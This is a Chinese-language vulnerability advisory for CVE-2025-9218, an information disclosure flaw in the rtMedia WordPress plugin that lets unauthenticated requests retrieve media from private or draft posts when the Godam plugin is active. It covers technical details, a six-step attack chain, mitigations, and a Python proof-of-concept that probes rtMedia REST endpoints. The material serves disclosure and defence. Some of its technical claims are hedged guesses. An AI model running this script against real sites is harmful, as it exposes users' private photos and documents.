CVE-2025-9218 rtMedia WordPress插件信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-9218

漏洞类型

信息泄露

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

rtMedia for WordPress, BuddyPress and bbPress plugin

漏洞概述

CVE-2025-9218是WordPress平台rtMedia插件的一个信息泄露漏洞。该漏洞存在于rtMedia插件的REST API处理函数handle_rest_pre_dispatch()中，由于缺少适当的授权检查，当网站同时安装并激活Godam插件时，未经身份认证的远程攻击者可以访问原本应受保护的媒体资源。具体而言，攻击者能够检索与草稿状态或私有帖子相关联的媒体文件，包括图片、视频、音频等多媒体内容。此漏洞影响rtMedia插件4.7.0至4.7.3版本。rtMedia是一款流行的WordPress媒体管理插件，为WordPress、BuddyPress和bbPress平台提供媒体上传、管理和分享功能。由于该插件被广泛应用于社交网络、社区论坛等类型的网站，漏洞可能暴露大量私有媒体内容，包括用户个人照片、私密文档等敏感信息。虽然漏洞本身不直接导致服务器被入侵或数据被篡改，但信息泄露可能为后续攻击提供有价值的情报，或导致用户隐私泄露。由于攻击复杂度较高（需要Godam插件同时存在）且CVSS评分仅为3.7，该漏洞被评定为低危级别，但仍建议相关用户及时采取修复措施。

技术细节

rtMedia插件在4.7.0版本中引入了REST API功能以支持更灵活的媒体管理。该插件的RTMediaJsonApi.php文件中的handle_rest_pre_dispatch()函数负责处理REST API请求。在正常情况下，访问与草稿或私有帖子关联的媒体需要具备相应的文章阅读权限，WordPress核心会通过current_user_can()等函数进行权限检查。然而，由于handle_rest_pre_dispatch()函数在处理请求时缺少必要的授权验证逻辑，当Godam插件被激活时，这两个插件之间的交互会导致权限检查被绕过。具体来说，Godam插件可能修改了WordPress的REST API请求处理流程，使得rtMedia的API端点在某些情况下跳过了标准的权限验证步骤。攻击者可以通过构造特定的REST API请求，直接访问类似/wp-json/rtmedia/v1/media/的端点，配合目标媒体ID或帖子ID参数，即可获取与私有/草稿帖子关联的媒体信息。漏洞利用的关键在于理解rtMedia的REST API路由和参数结构，攻击者可能需要枚举媒体ID或利用其他端点信息来定位目标资源。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者确认目标网站运行WordPress并安装rtMedia插件（4.7.0-4.7.3版本）

STEP 2

步骤2

确认Godam插件状态：攻击者验证目标网站是否同时安装了Godam插件

STEP 3

步骤3

构造恶意请求：攻击者构造针对rtMedia REST API端点的HTTP GET请求

STEP 4

步骤4

绕过授权检查：由于Godam插件与rtMedia的交互，handle_rest_pre_dispatch()函数跳过权限验证

STEP 5

步骤5

信息泄露：攻击者成功获取与草稿或私有帖子关联的媒体项URL和元数据

STEP 6

步骤6

数据收集：攻击者可能直接访问媒体文件URL下载敏感内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

def check_cve_2025_9218(target_url, media_id=None, post_id=None):
    """
    CVE-2025-9218 PoC - rtMedia Information Disclosure
    Requirements: Godam plugin must be active
    """
    
    # Target must have rtMedia plugin installed (versions 4.7.0-4.7.3)
    # Target must have Godam plugin active
    
    endpoints = [
        f"{target_url}/wp-json/rtmedia/v1/media/{media_id if media_id else '1'}",
        f"{target_url}/wp-json/rtmedia/v1/album/1",
        f"{target_url}/wp-json/rtmedia/v1/media/?post_id={post_id if post_id else '999'}"
    ]
    
    for endpoint in endpoints:
        try:
            print(f"[*] Testing endpoint: {endpoint}")
            response = requests.get(endpoint, timeout=10, verify=False)
            
            if response.status_code == 200:
                data = response.json()
                if data and len(data) > 0:
                    print(f"[!] VULNERABLE! Media items leaked:")
                    print(f"[+] Response: {data}")
                    return True
            elif response.status_code == 401 or response.status_code == 403:
                print(f"[-] Protected (expected behavior)")
            else:
                print(f"[-] Status: {response.status_code}")
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Error: {e}")
    
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-9218.py <target_url> [media_id] [post_id]")
        print("Example: python cve-2025-9218.py https://example.com 123")
        sys.exit(1)
    
    target = sys.argv[1]
    media_id = sys.argv[2] if len(sys.argv) > 2 else None
    post_id = sys.argv[3] if len(sys.argv) > 3 else None
    
    check_cve_2025_9218(target, media_id, post_id)

影响范围

rtMedia for WordPress, BuddyPress and bbPress plugin 4.7.0

rtMedia for WordPress, BuddyPress and bbPress plugin 4.7.1

rtMedia for WordPress, BuddyPress and bbPress plugin 4.7.2

rtMedia for WordPress, BuddyPress and bbPress plugin 4.7.3

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 临时禁用Godam插件（如果业务允许）；2) 使用WordPress安全插件（如Wordfence）配置规则阻止对rtMedia REST API端点的未认证访问；3) 通过.htaccess或Nginx配置限制访问/wp-json/rtmedia/路径；4) 检查并删除所有与草稿或私有帖子关联的敏感媒体文件；5) 启用WordPress的日志记录功能，监控异常的API访问请求。